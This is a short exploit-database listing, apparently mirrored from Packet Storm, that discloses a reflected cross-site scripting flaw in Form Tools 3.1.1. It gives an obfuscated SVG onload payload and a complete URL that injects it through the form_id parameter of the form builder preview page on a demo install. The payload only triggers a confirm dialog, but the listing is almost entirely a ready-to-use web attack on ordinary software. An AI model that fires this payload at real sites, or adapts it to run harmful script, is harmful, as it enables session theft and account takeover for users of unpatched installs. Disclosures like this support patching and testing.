Share
## https://sploitus.com/exploit?id=PACKETSTORM:176403
# Exploit Title: Form Tools Version: 3.1.1 - Reflected XSS   
# Date: 2024-6-1  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://formtools.org/  
# Version: 3.1.1  
# Tested on: https://www.softaculous.com/demos/Form_Tools  
  
  
1 ) Write after form_id your payload : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2  
Payload : "><sVg/onLy=1 onLoaD=confirm(1)//  
2 ) You will bee alert button : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//